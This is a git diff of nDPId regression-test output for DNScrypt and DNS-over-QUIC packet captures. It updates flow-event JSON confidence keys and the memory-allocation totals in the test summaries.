00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"dnscrypt-v2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946760605285,"flow_last_seen":946760605285,"flow_idle_time":200000,"flow_min_l4_payload_len":1088,"flow_max_l4_payload_len":1088,"flow_tot_l4_payload_len":1088,"flow_avg_l4_payload_len":1088,"midstream":0,"thread_ts_msec":946760605285,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.2","src_port":50893,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01915{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"dnscrypt-v2.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":946760605285,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1130,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1130,"pkt_l4_len":1096,"thread_ts_msec":946760605285,"pkt":"AABeAAEK6qmpVXFVCABFAARclutAALMRCUt\/AAABfwAAAsbNFOkESCe048PqxHAbR9XexWcgBKkL3kOeOPWTE2vKv7G3b+NOW862Bvwb1rheRQw0qtTPgEfkm2BM74ld5CA+W62jGSnjSdoiN3bn9c9nxUkSoDVOuV\/3s7ElHCemxe0UkD1LvUy8p8mkYiyJByZqh\/TL+tyM9BYbJLyKl4eVVVUmkWzlIkQ8\/WuhnpFa3Pnl4FCof4Z1AFcjqWHjHTbQ00s\/sO6ObqcqEHiFQ3+hFKPz9bBRBZWfeqEU3hWWN4OunVcVjBVIH+oyNnf9Ldqyao3Hv1uVLcFryZLWtSTQ+TUZP7RHtGoj4axNiM4Sz7wu2+uP+AibNzkF1m9ssUSp2rQ7tNTH+uxSW1kUeR+13R3ypCAFwJqw\/VTXgzMfvcjuBPHrlpMxG36nZL\/+zwmhxqACloTIurY1g7wfxGufh02FIVF4K+Jc183KeSLvKymakWl1jrazrxgKDGwzCmkm\/qXsOyxoyVo59boGN73vaAXF8yLnk\/4vNz04JxTScUka4TOHKUXW8ZZ543tFdfRvtM2NKx84KnERvuwI\/uotbd04NQpoVtEiRRZMADKfart6vq32P23lHeY6n+mIbu2PA0gvFaxx5jWM3JmDKSD0o30ViNPe03NlnYSlQiW5FJ\/53xHptvxGrdm48kY+bJUL4BJa9O5+PfC0wB2a+yNdgtZ8d2Ojegp\/kYc3D4fTqTKjslUMThhuPbtzJcJR7XXfKIBDV5cnnDp7d+CI2Oar3wr\/zAoz9VHG24IjueUhl9sB9wO4qD\/KiPSpxNze8cwgJ24e6LGZ2e3Ay\/9kJIVk41uXqrdi54bVgXRXtvYhvorxpHXFV0LMZL2KCV8o9YlluRovDnaKb2GjLy3\/KKvuxcfe8RkRT3HoRtfYQolh6A5Hcjo\/jY6K8WK9AYDN4oGnBq2Zj4\/\/kX6Io7WhFljPtCYlDuu6c2DaooeLWfDA4aiTOcgajr55j+xPLf7QCmTIPnSNaljtC8eAv2zKtaHTOxfqBnVS2qgCianNYsfZKJnMugiHwOoaiJRwFh7pRkLQHsaRmUwL7vL3V61gMAYHLFcSc9eFMEELE0f\/ZCqihiDw76bxMzGRDmA2k1dv1pc9dZ99Ue\/PDqBzsXDzW0KYkSPi3FTRTVCcb3S1zt0x0i8Xn8a9DcLUqsCeFC+tn1mb0dgeRDdkXiH6Q6fSweEw2PTotOKU\/j9hJM680iuH5tTNwSeded2TpAJ0+s\/qihZjedAPyx6rLEqze3DvE7LdsxMHpTPE+MsP5MLsZXG4gnX+29YRCkNE3C55pGXwdkjw9WH9Kilh0MC0xfYccaNmVdRLqWcpDKmsXOheBIMt\/4erfzigzbscKLMVmi73r5KGkOYVsW04yU067zltq+0GH3UBPFcd61oBOkbsGPO4r1UmBlHZJoz0lwKh1rV3nPuBv46M4MKI6eSRqOL4FFePLAO7NiaYa+o="} 00938{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"dnscrypt-v2.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":946760605298,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":410,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":410,"pkt_l4_len":376,"thread_ts_msec":946760605298,"pkt":"6qmpVXFVLGv1oHfACABFAAGMP3pAADYR4Ix\/AAACfwAAARTpxs0BeEafcjZmbnZXajgMNKrUz4BH5JtgTO\/vSxmsaEEZ\/CAi1tHviASLJ0uizAKXOLABetwgqhCo5m4k1iiphPsQtmERIqMf5JqXqiSdLy1Ba297cOraSOTaFHJWit3rzIV3AowJFomZ6bNGgpjxuYxUP4ApyAtzXYDJCYeu\/TSh4Op6+VkA6r1rjj0eFvuUrgX0XUc9PplmByW+parwj6z4sTPvV7M24c3XCf31OpXMDgENn0dC\/NtCYAPIhFy5yJH4NN0uv+wCzBvfx5hamAafH0ucNQEWgtIToY\/UKfIcB1p2Rmxkik4bx1XvJZRpgatWlKpSSZ2osdUqE0Gf6dev8q1ZEmaD+Nt91oo9gqW7UnB\/A+rnjMC7Jl4QB0mRDv3NPjcpvDGjZgxCT\/Cm8FWDlE6PMnj9qJUAbU8j4wyOOwo1LdjYHrXav+2Cx6qKLtaO9UmFpkeQ1L0Y\/fU\/6vod5MZsIE9xe3xRC2JrvS8Zsa2Q5fU="} -00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"dnscrypt-v2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946760605285,"flow_last_seen":946760605298,"flow_idle_time":200000,"flow_min_l4_payload_len":368,"flow_max_l4_payload_len":1088,"flow_tot_l4_payload_len":1456,"flow_avg_l4_payload_len":728,"midstream":0,"thread_ts_msec":946760605298,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.2","src_port":50893,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"dnscrypt-v2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946760605285,"flow_last_seen":946760605298,"flow_idle_time":200000,"flow_min_l4_payload_len":368,"flow_max_l4_payload_len":1088,"flow_tot_l4_payload_len":1456,"flow_avg_l4_payload_len":728,"midstream":0,"thread_ts_msec":946760605298,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.2","src_port":50893,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"dnscrypt-v2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946760521313,"flow_last_seen":946760521327,"flow_idle_time":200000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":1088,"flow_tot_l4_payload_len":1328,"flow_avg_l4_payload_len":664,"midstream":0,"thread_ts_msec":946760605298,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.2","src_port":38650,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"dnscrypt-v2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946760605202,"flow_last_seen":946760605216,"flow_idle_time":200000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":1088,"flow_tot_l4_payload_len":1264,"flow_avg_l4_payload_len":632,"midstream":0,"thread_ts_msec":946760605298,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.2","src_port":42883,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"dnscrypt-v2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946760605285,"flow_last_seen":946760605298,"flow_idle_time":200000,"flow_min_l4_payload_len":368,"flow_max_l4_payload_len":1088,"flow_tot_l4_payload_len":1456,"flow_avg_l4_payload_len":728,"midstream":0,"thread_ts_msec":946760605298,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.2","src_port":50893,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"dnscrypt-v2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946760605285,"flow_last_seen":946760605298,"flow_idle_time":200000,"flow_min_l4_payload_len":368,"flow_max_l4_payload_len":1088,"flow_tot_l4_payload_len":1456,"flow_avg_l4_payload_len":728,"midstream":0,"thread_ts_msec":946760605298,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.2","src_port":50893,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"dnscrypt-v2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946760521313,"flow_last_seen":946760521327,"flow_idle_time":200000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":1088,"flow_tot_l4_payload_len":1328,"flow_avg_l4_payload_len":664,"midstream":0,"thread_ts_msec":946760605298,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.2","src_port":38650,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"dnscrypt-v2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946760605202,"flow_last_seen":946760605216,"flow_idle_time":200000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":1088,"flow_tot_l4_payload_len":1264,"flow_avg_l4_payload_len":632,"midstream":0,"thread_ts_msec":946760605298,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.2","src_port":42883,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00556{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":6,"source":"dnscrypt-v2.pcap","alias":"nDPId-test","packets-captured":6,"packets-processed":6,"total-skipped-flows":0,"total-l4-payload-len":4048,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":3,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":18,"global_ts_msec":946760605298} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 6/6 @@ -24,9 +24,9 @@ ~~ total active/idle flows...: 3/3 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5871737 bytes -~~ total memory freed........: 5871737 bytes -~~ total allocations/frees...: 118128/118128 +~~ total memory allocated....: 6005371 bytes +~~ total memory freed........: 6005371 bytes +~~ total allocations/frees...: 120890/120890 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 467 chars ~~ json string max len.......: 1924 chars diff --git a/test/results/dnscrypt_skype_false_positive.pcapng.out b/test/results/dnscrypt_skype_false_positive.pcapng.out index 26733e6c4..3eeb83025 100644 --- a/test/results/dnscrypt_skype_false_positive.pcapng.out +++ b/test/results/dnscrypt_skype_false_positive.pcapng.out @@ -5,9 +5,9 @@ 00784{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dnscrypt_skype_false_positive.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1625015363881,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"thread_ts_msec":1625015363881,"pkt":"YDjgxTWgeJS0JASgCABFAAEMb2FAADQRWrvUL+SIwKgCZAG7twoA+ISncjZmbnZXajh5YQcRfsUXF5uDrnRgM\/W0etYbRlCvzAlkKKyMUQLv0ljsGjvVtZfe\/2tl\/VnemuvYfUBk\/FlJZG2T9aqA3YLF1UTRltK97uI2ksWKJgX3BniRDpntrFamW1JEmb\/3xLyET8LVaXWh0WE97YtyY5BJWfj3a3nIABAcBULeLr+9m6kab1t2+yUw8O2x9jiPjOG9E0ybqrKAE6AYHqZ5TwJfUOjYj\/lXF7jHkO1u0hdfTacv4XB0pSOO1yv7woMURQKedSBCZ47xfNaXXx66LiGW4zFY9AWDuJNy+t3jJfjPP44rub81jFTM"} 00573{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":3,"source":"dnscrypt_skype_false_positive.pcapng","alias":"nDPId-test","packets-captured":3,"packets-processed":2,"total-skipped-flows":0,"total-l4-payload-len":752,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":6,"global_ts_msec":1625020200938} 01154{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dnscrypt_skype_false_positive.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1625020200938,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":1625020200938,"pkt":"eJS0JASgYDjgxTWgCABFcAIcvZMAAIwR8wjAqAJk1C\/kiLcKAbsCCH3e0xsCBCrEBvNJfmmTQksKFsBudVhmUbtKR7UA4dAhr2YeFsWFn50WD0vHrlH\/yRcXvmd7t8+K4M4sVr0Poj8Wk\/utpL\/xCX\/xF62azc12+nNI8QCtVvppS8TlqEq0v0z1ZL6VhUUGpPUFklJ6FIusCvwq2w1dSM6BMePG+Qo4lcOLbOLpFDdDpN7sGyBBByiu62SvizwpJiQ6P3\/ZSXKjnk+4TGpUh1Mb5c9mzEfAV3qGGdzKjeCok93Nwnvp36CiiO\/GOkE9r\/ZYsdRaCmC23bIy9acHKaDgHPfJpiFe0JUanQLCN9xYimCEsH8Zta9Ub1Y03R23fJnK8tpwkYIEBK7LZJ1F9iJoeKxBWFnz1ecGcBI1RX2es6McfzJoxkjQOuHEH6AiYPJoSwpKAve4ipq0HR\/HOtcm2eSvFhLdYG1E+T0mXDh9vYgTW5nrseVIT7nqhIq7lD3WYEFzszkgcd3k9UDRv+myTHfgeMeOMZENFmbm5E8g9X\/DmfsUhaGuiUNClJJMVj7goJjiEWrKvyoRVfrCC4PbNLMbvqDrlvRzXORnY\/CFgO7+WLg3KO2ey7CthW2BKxwYRE712SYEdOkDCt96TjkrXI1srSS+8m95DCo5Kt+A80OCrLXxvwtGpEmk4P+Hhi7NqGvVAPLHH8VQvEse4iqUK05\/zGpQspc="} -00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"dnscrypt_skype_false_positive.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1625015363846,"flow_last_seen":1625020200970,"flow_idle_time":200000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":1376,"flow_avg_l4_payload_len":344,"midstream":0,"thread_ts_msec":1625020200970,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"212.47.228.136","src_port":46858,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00707{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":5,"source":"dnscrypt_skype_false_positive.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1625015363846,"flow_last_seen":1625020200970,"flow_idle_time":200000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":1376,"flow_avg_l4_payload_len":344,"midstream":0,"thread_ts_msec":1625020200970,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"212.47.228.136","src_port":46858,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00705{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"dnscrypt_skype_false_positive.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1625015363846,"flow_last_seen":1625020500975,"flow_idle_time":200000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":2128,"flow_avg_l4_payload_len":354,"midstream":0,"thread_ts_msec":1625020500975,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"212.47.228.136","src_port":46858,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"dnscrypt_skype_false_positive.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1625015363846,"flow_last_seen":1625020200970,"flow_idle_time":200000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":1376,"flow_avg_l4_payload_len":344,"midstream":0,"thread_ts_msec":1625020200970,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"212.47.228.136","src_port":46858,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00707{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":5,"source":"dnscrypt_skype_false_positive.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1625015363846,"flow_last_seen":1625020200970,"flow_idle_time":200000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":1376,"flow_avg_l4_payload_len":344,"midstream":0,"thread_ts_msec":1625020200970,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"212.47.228.136","src_port":46858,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00705{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"dnscrypt_skype_false_positive.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1625015363846,"flow_last_seen":1625020500975,"flow_idle_time":200000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":2128,"flow_avg_l4_payload_len":354,"midstream":0,"thread_ts_msec":1625020500975,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"212.47.228.136","src_port":46858,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00577{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":6,"source":"dnscrypt_skype_false_positive.pcapng","alias":"nDPId-test","packets-captured":6,"packets-processed":6,"total-skipped-flows":0,"total-l4-payload-len":2128,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":1,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1625020500975} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 6/6 @@ -17,9 +17,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869617 bytes -~~ total memory freed........: 5869617 bytes -~~ total allocations/frees...: 118120/118120 +~~ total memory allocated....: 6003251 bytes +~~ total memory freed........: 6003251 bytes +~~ total allocations/frees...: 120882/120882 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 487 chars ~~ json string max len.......: 1159 chars diff --git a/test/results/doq.pcapng.out b/test/results/doq.pcapng.out index ca10fad7e..58458ae06 100644 --- a/test/results/doq.pcapng.out +++ b/test/results/doq.pcapng.out @@ -2,16 +2,16 @@ 00545{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"doq.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1606056093199} 00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"doq.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1606056093199,"flow_last_seen":1606056093199,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1606056093199,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","src_port":47826,"dst_port":784,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02135{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"doq.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1606056093199,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1606056093199,"pkt":"AAAAAAAAAAAAAAAAht1gJqqiBNgRQAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAButIDEATYBOvN\/wAAIAhwsYltsps+WghOL+O5iCYx+QBEtgiJINLAj38+CB9CqAWNGDJ\/Ht0GdZPYPfPv0gkn+G7KypaOwXpeaLqP2vrcKno6\/xJHt9kjbL2TY4b\/m9R6nztt0oBs85JJhS7Tj\/KxdnJUR5x1KoMSoiK8Up0wKQjS6CJwz+096+5cglByj68BpzrUHMPeI6GM8BR\/Wl2qjunMufbT3ODI125lDdGTaTqNLCMEIjagI12Vrkh1+4q55QnPNmDSc9uNkJ0l5bhH58Gr3GA8HfFg35RCENcGDFpWMYVXiM4ZLQRFPmW9PqqUvAkPFdK1\/e6zKceMIWl6qFwaRZM+da6dEGVcJjr7Z+tAEETRp6uqCb9nnpAvg2AYmEND50nvVEnJ0vebAvnDE4IogXJzua2gFwFm7VLYd1uL79o4iJgu\/rwI3t1+Scpc6iAB46mZWFz3fE1WDQxwSMiil9o8+U4JW1BkjaBlJjEwDLig1LbtT\/HP47m8JDRgq00wdO+B2e1saSoPUtzWH02fRpSsRwHLssxWK\/GeM8n4na9wb14wVoOdjdGJ+KEHpdBBYTSNse3PnwWrKaaP0mh7odZYLBlgeNvTBLAUy7TPWKcxmhtN6bsS\/Yjh2568CzWxz8tWmprG6YblEP1vhUU2WDKbQBSh9+e7EH2JaN6LGpgUM6\/yeDE+g\/QCDKFbnXJHaC3VNe2EpDTrUSTzTJX2ScnDPI4dI01EvvWXSfxAJzcCmkKAUz3B\/F3DS8bS2lYESb9nSox1FCQUX1S8MhWCL4jSZ4wobqLA6VEQ7puZt\/yd5mc0snO7+JferPZwSQV1jN5hdBcuNb6kj\/JG4pzUoB7QTPQcjcnBLCPQDWDzw3nQ+Ebywtgt9T0aEFqJVOTfT95bWTz6VinV\/brwfnTHpSbkUgeBvFyaDcSzRz5tFZ0q4\/gUbfajms9qKrPFsufIU5NQtKyl5gUxP+4xC0KsglyEqg4DVy8vzlOpHC9Zo8AzpD2Cd9yZUaVpS3jLxre91YlfpTBViFMhAAL1N+wl47YhA2pgyB2GGbWg1O6K4C74tiA9XM\/lrGlbtuiyqqRmlQ+OfACiiCT0\/fwnridhEP9NjW3A9LNkp5ph6u81Z1emHsIGmFkXyP7nojGy2XKkTHlNA+eKBGol\/TUgCzHu7qPwHu5vMLlk5NNq3Od8+eHViQU1LY+OXeYFHuY2S+VSf848yXn0P1WZ\/Hf4jpB8WMcPpj0cXHyY46IsajmZ4uRB40h68eDc26RMlrZAfwBIGjks8KSh5b2f1BdJ6LJ4taZkNl8x+qPVYwRdc+lJsRkcGfu+BxMBIzhOPr2wg8uauRqGpIMGiSEXt5eLhu3VHEqTuhLQrFWRwEWEm+WzY4itmVZYx3CM7zWu6j3KhN5W5HEWKe61AmbunEuzKrb9KKf1hG4Uz72IU4aUy8+qV8fLyqPe7E\/Hm\/QiosHbq0whMHw6xHc0E9dDFb7\/w2jqW\/bhRCLrrZSTu8KDShAe9bkemwaFOWgs8zleXJrozrnvcOKNBpToZAop8FcA1V6SZ+05avECZK7qQ04Uc8xlehoG+3W27ZNgeNIiTH8MtU0A5kV6veOOCPQW7GGwaBK9iuORoisN7YKGMwzzN0ZIQ\/IailJpjg=="} -00923{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"doq.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1606056093199,"flow_last_seen":1606056093199,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1606056093199,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","src_port":47826,"dst_port":784,"l4_proto":"udp","ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"},"quic": {"version":"TLSv1.3","alpn":"doq-i00","ja3":"c0ce40fbb78cbf86a14e6a38b26d6ede","tls_supported_versions":"TLSv1.3,TLSv1.3 (draft),TLSv1.3 (draft),TLSv1.3 (draft)"}} +00923{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"doq.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1606056093199,"flow_last_seen":1606056093199,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1606056093199,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","src_port":47826,"dst_port":784,"l4_proto":"udp","ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"},"quic": {"version":"TLSv1.3","alpn":"doq-i00","ja3":"c0ce40fbb78cbf86a14e6a38b26d6ede","tls_supported_versions":"TLSv1.3,TLSv1.3 (draft),TLSv1.3 (draft),TLSv1.3 (draft)"}} 